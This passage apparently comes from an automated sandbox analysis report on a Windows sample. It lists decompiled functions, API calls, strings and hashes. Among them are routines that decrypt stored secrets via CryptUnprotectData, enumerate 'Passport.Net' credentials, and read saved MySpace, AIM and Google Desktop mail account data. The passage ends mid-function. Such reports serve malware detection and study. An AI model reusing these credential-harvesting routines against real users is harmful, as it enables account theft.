                                          0x00406846
                                          0x0040684f
                                          0x0040685a
                                          0x0040685b
                                          0x00406868
                                          0x00406889

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ErrorLastMessagesprintf
                                          • String ID: Error$Error %d: %s
                                          • API String ID: 1670431679-1552265934
                                          • Opcode ID: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
                                          • Instruction ID: 390cea375f2136b4ea19b9d86a6fd2b83de258ebf73c3752b6ef921ad7f75954
                                          • Opcode Fuzzy Hash: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
                                          • Instruction Fuzzy Hash: 5CF0ECB780020877CB11A754CC05FD676BCBB84704F1540BAB905F2140FF74DA458FA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004108FA, Relevance: 7.6, APIs: 6, Instructions: 141COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                            • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                          • memset.MSVCRT ref: 00410939
                                          • memset.MSVCRT ref: 0041097A
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$AddressLibraryLoadProc
                                          • String ID:
                                          • API String ID: 95357979-0
                                          • Opcode ID: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
                                          • Instruction ID: c4421e9d11457ef95cabe1857e087483fdaed0180908bfd30e84e21e9d597d19
                                          • Opcode Fuzzy Hash: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
                                          • Instruction Fuzzy Hash: 6F5139B1C1021DAADF10DF95CD819EEB7BCBF18348F4001AAE605B2251E7789B84CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C929, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 67COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E0040C929(signed int __eax, void* __ecx, void* _a4) {
				unsigned int _t23;
				signed int _t25;
				unsigned int _t34;
				unsigned int _t36;
				void* _t40;
				unsigned int _t45;
				void* _t46;
				int _t47;
				void* _t48;
				void* _t50;

				_t48 = __ecx;
				_t34 = __eax;
				_t23 =  *(__ecx + 0x10);
				_t36 = _t23 + __eax * 8;
				 *(__ecx + 0x10) = _t36;
				if(_t36 < _t23) {
					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
				}
				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
				_t25 = _t23 >> 0x00000003 & 0x0000003f;
				if(_t25 == 0) {
					L6:
					if(_t34 >= 0x40) {
						_t45 = _t34 >> 6;
						do {
							memcpy(_t48 + 0x18, _a4, 0x40);
							_t50 = _t50 + 0xc;
							E0040CA46(_t48 + 0x18, _t48);
							_a4 = _a4 + 0x40;
							_t34 = _t34 - 0x40;
							_t45 = _t45 - 1;
						} while (_t45 != 0);
					}
					_push(_t34);
					_push(_a4);
					_push(_t48 + 0x18);
				} else {
					_t46 = 0x40;
					_t47 = _t46 - _t25;
					_t40 = _t48 + 0x18 + _t25;
					if(_t34 >= _t47) {
						memcpy(_t40, _a4, _t47);
						_t50 = _t50 + 0xc;
						E0040CA46(_t48 + 0x18, _t48);
						_a4 = _a4 + _t47;
						_t34 = _t34 - _t47;
						goto L6;
					} else {
						_push(_t34);
						_push(_a4);
						_push(_t40);
					}
				}
				return memcpy();
			}













                                          0x0040c92e
                                          0x0040c930
                                          0x0040c932
                                          0x0040c935
                                          0x0040c93b
                                          0x0040c93e
                                          0x0040c940
                                          0x0040c940
                                          0x0040c948
                                          0x0040c94e
                                          0x0040c951
                                          0x0040c983
                                          0x0040c986
                                          0x0040c98a
                                          0x0040c98d
                                          0x0040c996
                                          0x0040c99b
                                          0x0040c9a3
                                          0x0040c9a8
                                          0x0040c9ac
                                          0x0040c9af
                                          0x0040c9af
                                          0x0040c98d
                                          0x0040c9b2
                                          0x0040c9b3
                                          0x0040c9b9
                                          0x0040c953
                                          0x0040c955
                                          0x0040c956
                                          0x0040c95a
                                          0x0040c95e
                                          0x0040c96c
                                          0x0040c971
                                          0x0040c979
                                          0x0040c97e
                                          0x0040c981
                                          0x00000000
                                          0x0040c960
                                          0x0040c960
                                          0x0040c961
                                          0x0040c964
                                          0x0040c964
                                          0x0040c95e
                                          0x0040c9c6

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: @$@
                                          • API String ID: 3510742995-149943524
                                          • Opcode ID: 77fc6db62da11d4799c937781f1bf202b3f83c4704148cc1087516cdf216477c
                                          • Instruction ID: 666a53640e029d8b41511af47e133ff9607f2a84e66000161f6e85dafd6cdb1f
                                          • Opcode Fuzzy Hash: 77fc6db62da11d4799c937781f1bf202b3f83c4704148cc1087516cdf216477c
                                          • Instruction Fuzzy Hash: 7C115BF2A00709ABCB248F25ECC0DAA77A8EB50344B00033FFD0696291E634DE49C6D9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410B95, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 62stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memsetstrlen$_mbscat_mbscpy
                                          • String ID: MySpace\IM\users.txt
                                          • API String ID: 779718277-1720829597
                                          • Opcode ID: 3e02ad04ea574821ad089c52dbc2ff5089a47234be35b4f74d739cd638fffc46
                                          • Instruction ID: 202a42f0f95dfe566303623c375a0ffeb092d6a880f5aac0c7a4f490a513d9c5
                                          • Opcode Fuzzy Hash: 3e02ad04ea574821ad089c52dbc2ff5089a47234be35b4f74d739cd638fffc46
                                          • Instruction Fuzzy Hash: 3511CA7390411C6AD710EA51EC85EDB777C9F61305F1404FBE549E2042EEB89FC88BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040A455, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 49%
                                          			E0040A455(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v259;
				char _v260;
				char* _t30;
				signed int _t33;
				char* _t44;
				void* _t46;

				E004067EC(_a4, "<item>");
				_t33 = 0;
				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						 *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t33 * 4),  *((intOrPtr*)(__edi + 0x4c)));
						0x41244b();
						_t44 =  &_v260;
						E00409DD6(_t44,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t33 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
						_t30 = _t44;
						_push(_t30);
						_push( *((intOrPtr*)(__edi + 0x50)));
						_push(_t30);
						sprintf( *(__edi + 0x54), "<%s>%s</%s>");
						E004067EC(_a4,  *(__edi + 0x54));
						_t46 = _t46 + 0x28;
						_t33 = _t33 + 1;
					} while (_t33 <  *((intOrPtr*)(__edi + 0x20)));
				}
				return E004067EC(_a4, "</item>");
			}









                                          0x0040a467
                                          0x0040a46c
                                          0x0040a473
                                          0x0040a476
                                          0x0040a484
                                          0x0040a48b
                                          0x0040a4a2
                                          0x0040a4a7
                                          0x0040a4b6
                                          0x0040a4bc
                                          0x0040a4c1
                                          0x0040a4c3
                                          0x0040a4c4
                                          0x0040a4c7
                                          0x0040a4d0
                                          0x0040a4db
                                          0x0040a4e0
                                          0x0040a4e3
                                          0x0040a4e4
                                          0x0040a4e9
                                          0x0040a4fb

                                          APIs
                                            • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                            • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                          • memset.MSVCRT ref: 0040A48B
                                            • Part of subcall function 0041244B: memcpy.MSVCRT ref: 004124B9
                                            • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
                                            • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
                                          • sprintf.MSVCRT ref: 0040A4D0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                          • String ID: <%s>%s</%s>$</item>$<item>
                                          • API String ID: 3337535707-2769808009
                                          • Opcode ID: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
                                          • Instruction ID: 35c3a08c9f4b1e8506f5bd30b0a1229d9af700aff423b6f7980a7f41b92f6d4d
                                          • Opcode Fuzzy Hash: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
                                          • Instruction Fuzzy Hash: E811E731500616BFD711AF15CC42E9ABB68FF0831CF10402AF409665A1EB76B974CB88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B1EC, Relevance: 7.6, APIs: 5, Instructions: 57windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E0040B1EC(void* __ebx) {
				void* __esi;
				void* _t18;
				void* _t37;

				_t37 = __ebx;
				_t18 = E00401033();
				if(_t18 == 0x37e9) {
					memcpy( *((intOrPtr*)(__ebx + 0x390)) + 0x1d4,  *(__ebx + 0x38c), 0x1c8 << 2);
					asm("movsw");
					asm("movsb");
					SendMessageA( *( *((intOrPtr*)(__ebx + 0x390)) + 0x184), 0xb, 0, 0);
					E0040671B();
					 *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x390)) + 0x28)) = 0;
					SendMessageA( *( *((intOrPtr*)(__ebx + 0x390)) + 0x184), 0x1009, 0, 0);
					if(E004028E7() == 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x390)))) + 0x5c))();
					}
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x390)))) + 0x74))(1);
					E0040B15B(_t37);
					SetCursor( *0x41dbd8);
					SetFocus( *( *((intOrPtr*)(_t37 + 0x390)) + 0x184));
					return SendMessageA( *( *((intOrPtr*)(_t37 + 0x390)) + 0x184), 0xb, 1, 0);
				}
				return _t18;
			}






                                          0x0040b1ec
                                          0x0040b1ec
                                          0x0040b1f6
                                          0x0040b216
                                          0x0040b218
                                          0x0040b21d
                                          0x0040b233
                                          0x0040b235
                                          0x0040b242
                                          0x0040b256
                                          0x0040b25f
                                          0x0040b269
                                          0x0040b269
                                          0x0040b276
                                          0x0040b27b
                                          0x0040b286
                                          0x0040b298
                                          0x00000000
                                          0x0040b2b3
                                          0x0040b2b4

                                          APIs
                                          • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B233
                                            • Part of subcall function 0040671B: LoadCursorA.USER32(00000000,00007F02), ref: 00406722
                                            • Part of subcall function 0040671B: SetCursor.USER32(00000000), ref: 00406729
                                          • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B256
                                            • Part of subcall function 004028E7: GetModuleHandleA.KERNEL32(00000000), ref: 00402902
                                            • Part of subcall function 004028E7: GetProcAddress.KERNEL32(00000000,00000000), ref: 00402924
                                            • Part of subcall function 004028E7: FreeLibrary.KERNEL32(00000000), ref: 00402934
                                          • SetCursor.USER32(?,?,0040C35B), ref: 0040B286
                                          • SetFocus.USER32(?,?,?,0040C35B), ref: 0040B298
                                          • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B2AF
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CursorMessageSend$AddressFocusFreeHandleLibraryLoadModuleProc
                                          • String ID:
                                          • API String ID: 1022157474-0
                                          • Opcode ID: b84fe70da1aaf1055744e1b632632b9f496727907b48f7315893cd4c83107089
                                          • Instruction ID: acf4f1a7ad8cb56491b263665e164ee1eacf8da490df75951db8ca09a257b5c1
                                          • Opcode Fuzzy Hash: b84fe70da1aaf1055744e1b632632b9f496727907b48f7315893cd4c83107089
                                          • Instruction Fuzzy Hash: 5C111235200204AFDB16AF55CC85FD537ADFF49708F0A40B9FD099F2A2CBB569108B68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408A69, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00408A69(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00406DA8(_t30);
				}
				return 1;
			}









                                          0x00408a74
                                          0x00408a77
                                          0x00408a81
                                          0x00408a88
                                          0x00408a93
                                          0x00408aa3
                                          0x00408ab1
                                          0x00408ab9
                                          0x00408abf
                                          0x00408ac5
                                          0x00408aca
                                          0x00408acd
                                          0x00408ad2
                                          0x00408ad8

                                          APIs
                                          • GetParent.USER32(?), ref: 00408A7B
                                          • GetWindowRect.USER32(?,?), ref: 00408A88
                                          • GetClientRect.USER32(00000000,?), ref: 00408A93
                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408AA3
                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408ABF
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Window$Rect$ClientParentPoints
                                          • String ID:
                                          • API String ID: 4247780290-0
                                          • Opcode ID: 3aa8e274ce559d31e536c38d989a921174712bd1f9a65828c633d0b3e27811af
                                          • Instruction ID: 47fd7c03741454bdc7a166d99d5f54bcb442ad9a41c6e05a353417ffaf8a91e2
                                          • Opcode Fuzzy Hash: 3aa8e274ce559d31e536c38d989a921174712bd1f9a65828c633d0b3e27811af
                                          • Instruction Fuzzy Hash: 0F014832901129BBDB11DBA5DC49EFFBFBCEF86750F04802AFD11A2140D77895018BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040A627, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E0040A627(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				char* _t28;

				_t26 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				E004067EC(_a4, "<?xml version="1.0"  encoding="ISO-8859-1" ?>");
				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
				_t28 =  &_v260;
				E00409DD6(_t28, _t17);
				_push(_t28);
				sprintf( &_v516, "<%s>");
				return E004067EC(_a4,  &_v516);
			}











                                          0x0040a641
                                          0x0040a643
                                          0x0040a64a
                                          0x0040a659
                                          0x0040a660
                                          0x0040a66d
                                          0x0040a679
                                          0x0040a67d
                                          0x0040a683
                                          0x0040a68a
                                          0x0040a697
                                          0x0040a6b1

                                          APIs
                                          • memset.MSVCRT ref: 0040A64A
                                          • memset.MSVCRT ref: 0040A660
                                            • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                            • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                            • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
                                            • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
                                          • sprintf.MSVCRT ref: 0040A697
                                          Strings
                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040A665
                                          • <%s>, xrefs: 0040A691
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                          • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                          • API String ID: 3699762281-1998499579
                                          • Opcode ID: ab5707da10e36317461923ea0a964ffd6f4046b5a0df19b15fd79c1ac8c7a337
                                          • Instruction ID: 800cbe4d2eb2546f00b8b879064eadffaf4e9ad3efc3a30f3f6e1286e630d524
                                          • Opcode Fuzzy Hash: ab5707da10e36317461923ea0a964ffd6f4046b5a0df19b15fd79c1ac8c7a337
                                          • Instruction Fuzzy Hash: 92012B7294021977DB21A715CC46FDA7B6CAF14709F0400BBB50DF3082DB789B848BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409370, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: f3ce8d52872a8f30b96e2fbf292860e550b06a588b426c696271bbab4e9a7e1e
                                          • Instruction ID: fe66dba444066183ee9975a3477c76674c14659d363ac613d024ab661048b2ad
                                          • Opcode Fuzzy Hash: f3ce8d52872a8f30b96e2fbf292860e550b06a588b426c696271bbab4e9a7e1e
                                          • Instruction Fuzzy Hash: 25F0FF726097015BD7209FAAB5C059BB7E9BB49725B60193FF54DD3682C738BC808A1C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004093D6, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 31%
                                          			E004093D6(intOrPtr* __edi) {
				void* __esi;
				intOrPtr* _t7;
				intOrPtr* _t12;
				intOrPtr* _t18;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;

				_t18 = __edi;
				 *__edi = 0x418528;
				E00409370(__edi);
				_t21 =  *((intOrPtr*)(__edi + 0x10));
				if(_t21 != 0) {
					E00407491(_t21);
					0x413d56(_t21);
				}
				_t22 =  *((intOrPtr*)(_t18 + 0xc));
				if(_t22 != 0) {
					E00407491(_t22);
					0x413d56(_t22);
				}
				_t23 =  *((intOrPtr*)(_t18 + 8));
				if(_t23 != 0) {
					E00407491(_t23);
					0x413d56(_t23);
				}
				_t24 =  *((intOrPtr*)(_t18 + 4));
				if(_t24 != 0) {
					E00407491(_t24);
					0x413d56(_t24);
				}
				_t12 = _t18;
				_t7 =  *((intOrPtr*)( *_t12))();
				0x413de6( *_t7);
				return _t7;
			}











                                          0x004093d6
                                          0x004093d9
                                          0x004093df
                                          0x004093e4
                                          0x004093e9
                                          0x004093eb
                                          0x004093f1
                                          0x004093f6
                                          0x004093f7
                                          0x004093fc
                                          0x004093fe
                                          0x00409404
                                          0x00409409
                                          0x0040940a
                                          0x0040940f
                                          0x00409411
                                          0x00409417
                                          0x0040941c
                                          0x0040941d
                                          0x00409422
                                          0x00409424
                                          0x0040942a
                                          0x0040942f
                                          0x00409430
                                          0x0040943a
                                          0x0040943e
                                          0x00409444

                                          APIs
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040937C
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040938A
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040939B
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093B2
                                            • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093BB
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004093F1
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409404
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409417
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040942A
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040943E
                                            • Part of subcall function 00407491: ??3@YAXPAX@Z.MSVCRT ref: 00407498
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: ac05d42046456b830cc0969aedd76e8629731d07fd3b456628963a844cb8144e
                                          • Instruction ID: 09cfe481c9f5149ef6062cf2713671c90beccbfb684cd0f5c8863379cec44e3f
                                          • Opcode Fuzzy Hash: ac05d42046456b830cc0969aedd76e8629731d07fd3b456628963a844cb8144e
                                          • Instruction Fuzzy Hash: 67F06232D0E53167C9257F26B00158EA7646E46725315426FF8097B3D3CF3C6D8146EE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00411B27, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406B6F: memset.MSVCRT ref: 00406B8F
                                            • Part of subcall function 00406B6F: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406BA2
                                            • Part of subcall function 00406B6F: _strcmpi.MSVCRT ref: 00406BB4
                                          • SetBkMode.GDI32(?,00000001), ref: 00411B4E
                                          • GetSysColor.USER32(00000005), ref: 00411B56
                                          • SetBkColor.GDI32(?,00000000), ref: 00411B60
                                          • SetTextColor.GDI32(?,00C00000), ref: 00411B6E
                                          • GetSysColorBrush.USER32(00000005), ref: 00411B76
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Color$BrushClassModeNameText_strcmpimemset
                                          • String ID:
                                          • API String ID: 2775283111-0
                                          • Opcode ID: 4c6c90dc6369ed9def7ad49a685608b6b97007b198ef546a8f3c4911ca2b9476
                                          • Instruction ID: b9af807899647846139a12986955ac2cc84645abd360b6802fc8b760439410eb
                                          • Opcode Fuzzy Hash: 4c6c90dc6369ed9def7ad49a685608b6b97007b198ef546a8f3c4911ca2b9476
                                          • Instruction Fuzzy Hash: 92F03136104504FBDF112FA5EC09FDE3F25EF44721F10812AFA19951B1DB75A9A09B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040FF88, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00404109: LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040FFAB,73AFF420,?,?,?,?,?,?,?,?,?,?,?,0040DB18), ref: 00404116
                                            • Part of subcall function 00404109: GetProcAddress.KERNEL32(00000000,CredReadW), ref: 0040412F
                                            • Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredFree), ref: 0040413B
                                            • Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404147
                                            • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                            • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
                                          • LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$ByteCharLibraryLoadMultiWide$FreeLocal
                                          • String ID: Passport.Net\*
                                          • API String ID: 4171712514-3671122194
                                          • Opcode ID: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
                                          • Instruction ID: a8053254f1e515f4d897164d33fe2023de59da6d422685d1f9c73d0263123044
                                          • Opcode Fuzzy Hash: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
                                          • Instruction Fuzzy Hash: 9231F7B1D01129AADB10DF95DC44EDEBBB8FF49750F11406BF610A7250D7789A81CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410AC5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                          • GetFileSize.KERNEL32(00000000,00000000,MySpace\IM\users.txt,00000104,00000000,?,?,?,?,00410C45,?,00000000), ref: 00410AE7
                                            • Part of subcall function 00407A56: ??3@YAXPAX@Z.MSVCRT ref: 00407A5D
                                            • Part of subcall function 00407A56: ??2@YAPAXI@Z.MSVCRT ref: 00407A6B
                                            • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,?,?,?,?,?,?,?,00410C45), ref: 00410B64
                                            • Part of subcall function 004108FA: memset.MSVCRT ref: 00410939
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00410C45,?,00000000), ref: 00410B78
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: File$??2@??3@ByteCharCloseCreateHandleMultiReadSizeWidememset
                                          • String ID: MySpace\IM\users.txt
                                          • API String ID: 429556018-1720829597
                                          • Opcode ID: 9ecfc60a0865bdac6d3c577decf5946b40f4711ca6fbc71636231e6ee1035587
                                          • Instruction ID: 28eca0bbeff0950369e7ada1521615d79b3b69832f60dc8e7f5924118cda3e2e
                                          • Opcode Fuzzy Hash: 9ecfc60a0865bdac6d3c577decf5946b40f4711ca6fbc71636231e6ee1035587
                                          • Instruction Fuzzy Hash: 21217171C0424AEFCF00DFA9CC458DEBB74EF41328B158166E924772A1C634AA45CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402834, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          • memset.MSVCRT ref: 00402873
                                            • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                          • RegCloseKey.ADVAPI32(?), ref: 004028C2
                                          • RegCloseKey.ADVAPI32(?), ref: 004028DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Close$EnumOpenmemset
                                          • String ID: Software\AIM\AIMPRO
                                          • API String ID: 2255314230-3527110354
                                          • Opcode ID: dded90e1ec05a9ac15428789d49d31d8fd58391a594f54d73697f6d07bfadf32
                                          • Instruction ID: 67585355273d4b01a1114a6cd89f6c97ebf6c1cbf8b7b4d496df69d3c229a794
                                          • Opcode Fuzzy Hash: dded90e1ec05a9ac15428789d49d31d8fd58391a594f54d73697f6d07bfadf32
                                          • Instruction Fuzzy Hash: 48115E76904118BADF21A792ED06FDE7B7CDF54304F0000B6AA44E1091EB756FD5DA64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407BC6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00407BC6(intOrPtr* _a4) {
				void* _v12;
				void* _v16;
				void _v271;
				char _v272;
				void** _t16;
				char* _t19;
				char* _t21;
				int _t26;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;

				_t16 =  &_v12;
				0x411d68(0x80000001, "Software\Google\Google Desktop\Mailboxes", _t16);
				_t29 = _t28 + 0xc;
				if(_t16 == 0) {
					_t26 = 0;
					_v272 = 0;
					memset( &_v271, 0, 0xff);
					_t30 = _t29 + 0xc;
					_t19 =  &_v272;
					0x411dee(_v12, 0, _t19);
					while(1) {
						_t31 = _t30 + 0xc;
						if(_t19 != 0) {
							break;
						}
						_t21 =  &_v272;
						0x411d68(_v12, _t21,  &_v16);
